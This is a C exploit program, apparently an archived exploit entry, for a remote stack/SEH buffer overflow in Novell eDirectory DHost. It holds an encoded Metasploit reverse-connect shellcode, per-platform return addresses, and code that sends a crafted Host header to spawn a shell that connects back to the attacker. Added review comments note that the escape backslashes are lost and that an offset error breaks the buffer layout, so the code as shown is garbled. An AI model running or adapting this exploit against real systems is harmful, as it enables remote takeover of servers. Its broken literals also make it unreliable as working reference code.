
# Title : Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit
# Published : 2006-10-30
# Author : Expanders


/*
       _______         ________           .__        _____          __
___  __   _     ____ _____            |  |__    /  |  |   ____ |  | __
  /  /  /_   /      _(__  <   ______ |  |    /   |  |__/ ___|  |/ /
 >    <  _/      |  /        /_____/ |   Y  /    ^   /  ___|    <
/__/_ \_____  /___|  /______  /         |___|  /____   |  ___  >__|_ 
      /      /     /       /   30106    /      |__|      /     /
      
 *   mm.           dM8
 *  YMMMb.       dMM8      _____________________________________
 *   YMMMMb     dMMM'     [                                     ]
 *    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
 *      `YMMM  MMM'       [ windows I have yet to look through  ]
 *         "MbdMP         [ Going forward may not be the answer ]
 *     .dMMMMMM.P         [                                     ]
 *    dMM  MMMMMM         [       maybe I should go back        ]
 *    8MMMMMMMMMMI        [_____________________________________]
 *     YMMMMMMMMM                   www.netbunny.org
 *       "MMMMMMP
 *      MxM .mmm
 *      W"W """
 

[i] Title:              Novell eDirectory <= 9.0 DHost Buffer overflow exploit
[i] Discovered by:      Novell
[i] Original code by:   FistFuXXer
[i] Exploit by:         Expanders
[i] Filename:           XHNB-Novell-eDirectory_remote_bof.c
[i] References:         http://www.novell.com/
[i] Greetings:          x0n3-h4ck - netbunny

[ Research diary ]

After trying FistFuXXer's Perl exploit I started porting the code to C, using a different exploitation
method as well.  This exploit overwrites the Structured Exception Handler (SEH) to take control of the program flow.

[ Special thanks ]

FistFuXXer
H D Moore

[ Links ]

www.x0n3-h4ck.org
www.netbunny.org

*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUFFSIZE 1000 // Buffer size of the crafted Host-header value built in main()
#define DEADRET "xdexc0xadxde" // this address causes the exception to be called (written at buffer offset 68)
// NOTE(review): throughout this listing the "\x.." escapes (and "\r\n", "\n",
// "\t") have lost their backslashes, so these literals are plain ASCII as shown.
// exit/atoi/malloc/free, memcpy/memset/strlen and inet_addr are used below
// without <stdlib.h>, <string.h> and <arpa/inet.h> being included.

int banner();                                          // prints the ASCII banner; returns 0
int usage(char *filename);                             // prints help and calls exit(0); never returns
int inject(char *port, char *ip);                      // patches the callback ip/port into shellcode[]
int remote_connect( char* ip, unsigned short port );   // TCP connect helper; calls exit(1) on failure


/* Request template: one HTTP GET whose Host header value is the crafted
 * buffer (substituted by the sprintf in main()). The "rn" pairs are "\r\n"
 * with the backslashes lost in transcription. Detection note: a GET /nds
 * carrying a Host header of several hundred bytes of mostly 0x90 filler is
 * the on-the-wire pattern this produces. */
char attack[] =
"GET /nds HTTP/1.1rn"
"Host: %srnrn";

/* win32_reverse -  EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
/* Encoded reverse-connect payload. inject() overwrites bytes [184..187] and
 * [190..191] with the XOR-masked callback IP and port before main() copies
 * the string into the buffer. As with the other literals in this listing the
 * escape backslashes are missing, so as shown it is ASCII text and much
 * longer than the 312 bytes named above. */
char shellcode[] =
"x29xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13x3f"
"x61x88x6fx83xebxfcxe2xf4xc3x0bx63x22xd7x98x77x90"
"xc0x01x03x03x1bx45x03x2ax03xeaxf4x6ax47x60x67xe4"
"x70x79x03x30x1fx60x63x26xb4x55x03x6exd1x50x48xf6"
"x93xe5x48x1bx38xa0x42x62x3exa3x63x9bx04x35xacx47"
"x4ax84x03x30x1bx60x63x09xb4x6dxc3xe4x60x7dx89x84"
"x3cx4dx03xe6x53x45x94x0exfcx50x53x0bxb4x22xb8xe4"
"x7fx6dx03x1fx23xccx03x2fx37x3fxe0xe1x71x6fx64x3f"
"xc0xb7xeex3cx59x09xbbx5dx57x16xfbx5dx60x35x77xbf"
"x57xaax65x93x04x31x77xb9x60xe8x6dx09xbex8cx80x6d"
"x6ax0bx8ax90xefx09x51x66xcaxccxdfx90xe9x32xdbx3c"
"x6cx22xdbx2cx6cx9ex58x07x35x61x88x6cx59x09x8cx69"
"x59x32x01x8exaax09x64x96x95x01xdfx90xe9x0bx98x3e"
"x6ax9ex58x09x55x05xeex07x5cx0cxe2x3fx66x48x44xe6"
"xd8x0bxccxe6xddx50x48x9cx95xf4x01x92xc1x23xa5x91"
"x7dx4dx05x15x07xcax23xc4x57x13x76xdcx29x9exfdx47"
"xc0xb7xd3x38x6dx30xd9x3ex55x60xd9x3ex6ax30x77xbf"
"x57xccx51x6axf1x32x77xb9x55x9ex77x58xc0xb1xe0x88"
"x46xa7xf1x90x4ax65x77xb9xc0x16x74x90xefx09x78xe5"
"x3bx3exdbx90xe9x9ex58x6f";

/* Trailing stage: main() appends it after the chosen targets[] address, with
 * 8 filler bytes before and after it. Escape backslashes are missing here as
 * elsewhere in this listing. */
char jmpback[]=
//22 byte xor decoder (0x55)
"xEBx0Fx5Bx33xC9x66x83xE9xE0x80x33x55x43xE2xFAxEBx05xE8xECxFFxFFxFF"
//(20 byte jump-back code -> 256 + 256 + 64 bytes)
"x8CxBBx8Cx21x71xA1x0CxD5x94x5FxC5xABx98xABx98xD5xBCx15xAAxB4";

/* 4-byte fragment that main() writes immediately before the chosen
 * targets[] address (the slot the author's comment at the 680 offset
 * describes as the next-exception-structure pointer). */
char jmpover[]=
// 2 bytes jump 6 bytes over - 2 bytes NOP
"xEbx06x90x90";

/* Per-platform return address table, selected by the <targ> argument.
 * platform: label printed by usage(); addr: 32-bit address main() copies
 * (4 bytes of an unsigned long) into the buffer. The list ends with a NULL
 * platform sentinel that usage() stops on; main() does not bounds-check the
 * index it uses. */
struct retcodes{char *platform;unsigned long addr;} targets[]= {
        { "eDirectory MFC42U.dll", 0x5f80bbf7 },
        { "Windows NT SP 5/6"    , 0x776a1082 },   // ws2help.dll pop esi, pop ebx, retn  [Tnx to metasploit]
	{ "Windows 2k Universal" , 0x750211a9 },   // ws2help.dll pop ebp, pop ebx, retn  [Tnx to metasploit]
	{ "Windows XP Universal" , 0x71abe325 },   // ws2help.dll pop ebx, pop ebp, retn  [Tnx to metasploit]
	{ NULL }                                   // sentinel
};
int banner() {
  /* Print the tool's ASCII-art banner and credit lines to stdout.
   * Always returns 0. The literal text is kept exactly as authored. */
  static const char *const banner_lines[] = {
    "n       _______         ________           .__        _____          __     n",
    "___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __ n",
    "\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ / n",
    " >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <  n",
    "/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \ n",
    "      \/      \/     \/       \/               \/      |__|      \/     \/ nn",
    "[i] Title:        tNovell eDirectory DHost Buffer overflown",
    "[i] Perl Code by:tFistFuXXern",
    "[i] Exploit by:   tExpandersnn",
  };
  size_t line;
  /* None of the lines contains a conversion specifier, so fputs writes the
   * same bytes printf would. */
  for (line = 0; line < sizeof banner_lines / sizeof banner_lines[0]; line++) {
    fputs(banner_lines[line], stdout);
  }
  return 0;
}

int usage(char *filename) {
  /* Print the command-line synopsis and the numbered target table to stdout,
   * then terminate the process with exit(0). Declared int to match the
   * prototype but never returns. filename: argv[0], echoed in the synopsis. */
  int idx = 0;
  printf("Usage: t%s <host> <port> <l_ip> <l_port> <targ>nn",filename);
  fputs("       t<host>   : Victim's hostn", stdout);
  fputs("       t<port>   : Victim's port  ::  Default: 8028n", stdout);
  fputs("       t<l_ip>   : Local ip address for connectbackn", stdout);
  fputs("       t<l_port> : Local port for connectbackn", stdout);
  fputs("       t<targ>   : Target from the list belownn", stdout);

  fputs("#   t Platformn", stdout);
  fputs("-----------------------------------------------n", stdout);
  /* targets[] is terminated by an entry whose platform is NULL. */
  while (targets[idx].platform != NULL) {
    printf("%d t %sn",idx,targets[idx].platform);
    idx++;
  }
  fputs("-----------------------------------------------n", stdout);
  exit(0);
}

int inject(char *port, char *ip)
{
    /* Patch the connect-back endpoint into the encoded payload.
     * port, ip: the <l_port> and <l_ip> command-line strings (argv[4], argv[3]).
     * The address and port are XOR-masked with fixed constants and written over
     * shellcode[184..187] and shellcode[190..191]; presumably the payload's
     * decoder stub undoes the mask at run time (not verifiable from here).
     * atoi()/inet_addr() results are not validated: an unparsable ip yields
     * INADDR_NONE masked into the payload. Always returns 0. */
    unsigned long xorip;
    unsigned short xorport;
    xorip = inet_addr(ip)^(unsigned long)0x6F88613F;
    xorport = htons(atoi( port ))^(unsigned short)0x6F88;
    // xorip is an unsigned long (8 bytes on LP64); only its first 4 bytes are
    // copied, which on a little-endian host are the masked IPv4 address.
    memcpy ( &shellcode[184], &xorip, 4);
    memcpy ( &shellcode[190], &xorport, 2);
    return 0;
}

int remote_connect( char* ip, unsigned short port )
{
  /* Resolve `ip` (host name or dotted quad) with gethostbyname() and open a
   * TCP connection to `port` (host byte order). Returns the connected socket
   * descriptor. On any failure a diagnostic is printed and the process ends
   * with exit(1), so callers never see an error return. gethostbyname() is
   * IPv4-only and uses a shared result buffer; its first address is used. */
  struct hostent *he = gethostbyname ( ip );
  struct sockaddr_in sa;
  int fd;

  if ( he == NULL )
  {
   printf ( "[X] Cannot resolve "%s"n", ip );
   exit ( 1 );
  }

  memset ( &sa, 0, sizeof sa );
  sa.sin_family = AF_INET;
  sa.sin_port = htons ( port );
  memcpy ( &sa.sin_addr, he->h_addr, sizeof sa.sin_addr );   // first resolved address

  fd = socket ( AF_INET, SOCK_STREAM, 0 );
  if ( fd < 0 )
  {
   printf ( "[X] Socket failed!n" );
   exit ( 1 );
  }
  if ( connect ( fd, ( struct sockaddr * ) &sa, sizeof ( struct sockaddr ) ) ==  -1 )
  {
   printf ( "[X] Failed connecting!n" );
   exit ( 1 );
  }
  return fd;
}

/* Entry point. argv: <host> <port> <l_ip> <l_port> <targ> (see usage()).
 * Builds the Host-header value in `buffer` -- BUFFSIZE bytes of 0x90 filler
 * with the fragments placed at the fixed offsets the comments below give --
 * formats it into the request template `attack`, sends it once and exits.
 * NOTE(review): argc and <port> are range-checked, but <targ> is used as an
 * index into targets[] unchecked; malloc() results are not checked; `request`
 * is never freed; and `%d` is paired with a size_t (strlen) in the log line. */
int main(int argc, char *argv[]) {
    int s,position;
    unsigned int rcv;              // unused
    char *buffer,*request;
    char recvbuf[256];             // unused: nothing is ever read back from the server
    banner();
    if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
        usage(argv[0]);            // usage() calls exit(); control does not return here
    position = 0;
    printf("[+] Creating evil buffern");
    buffer = (char *) malloc(BUFFSIZE);
    request = (char *) malloc(BUFFSIZE + strlen(attack)); //  +3 == r + n + 0x00
    memset(buffer,0x90,BUFFSIZE);  // Fill with nops

    inject(argv[4],argv[3]);     // Xor port and ip and put them into the shellcode
    memset(buffer,0x41,68);      // First comes the ascii
    position = 68;
    memcpy(buffer+position,DEADRET,4);
    // NOTE(review): relies on strlen(shellcode) + 100 <= 680. As transcribed in
    // this listing (escape backslashes lost) the string is far longer than the
    // 312 bytes its comment names, so `position` goes negative and the memcpy
    // below would write before `buffer`.
    position = 680 - (strlen(shellcode) + 100);   // 680 : Pointer to next Execption structure
    memcpy(buffer+position,shellcode,strlen(shellcode));
    position += strlen(shellcode)+100;
    memcpy(buffer+position,jmpover,4); position += 4;
    // NOTE(review): atoi(argv[5]) is not checked against the table size (4
    // entries plus the NULL sentinel), so an out-of-range value reads past
    // targets[]. addr is an unsigned long; only its first 4 bytes are copied,
    // which on a little-endian host are the low-order bytes.
    memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
    position += 8; // 8 bytes more nops
    memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
    position += 8; // 8 bytes more nops
    memset(buffer+position,0x00,1); // End


    sprintf(request,attack,buffer);   // buffer is NUL-terminated at `position`; it becomes the Host header value
    printf("[+] Connecting to remote hostn");
    s = remote_connect(argv[1],atoi(argv[2]));   // exits the process on resolve/socket/connect failure
    sleep(1);
    printf("[+] Sending %d bytes of painfull buffern",strlen(buffer));
    // Detection note: the traffic is a single GET /nds whose Host header is
    // several hundred bytes of mostly 0x90 filler, sent to the DHost port
    // (8028 by default per usage()).
    if ( send ( s, request, strlen (request), 0) <= 0 )
    {
           printf("[X] Failed to send buffern");
           exit ( 1 );
    }
    printf("[+] Done - Wait for shell on port %sn",argv[4]);
    close(s);
    free(buffer);
    buffer = NULL;
    return 0;
}
